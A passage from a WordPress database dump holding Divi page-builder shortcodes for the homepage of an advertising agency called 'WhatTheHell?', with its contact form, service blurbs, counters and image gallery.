button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" fullwidth_field=\"on\" _builder_version=\"4.5.2\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-08-08 20:06:47','2020-08-08 20:06:47','',134,'https://wthtest1.in8.cdn-alpha.com/2020/08/08/134-revision-v1/',0,'revision','',0),(705,1,'2020-08-08 20:10:52','2020-08-08 20:10:52','Client Testimonial digital','Client Testimonial digital','','inherit','open','closed','','artboard-copy-5','','','2020-08-08 20:11:18','2020-08-08 20:11:18','',0,'https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-5.png',0,'attachment','image/png',0),(706,1,'2020-08-08 20:11:21','2020-08-08 20:11:21','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/banner.jpg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.jpg\" alt=\"Why We\" title_text=\"Why-we\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" title_text=\"800x800 w\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x400.jpg\" title_text=\"800x400\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"4.5.2\" custom_margin=\"||||false|false\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" title_text=\"800x800..1\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" title_text=\"800x800\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" 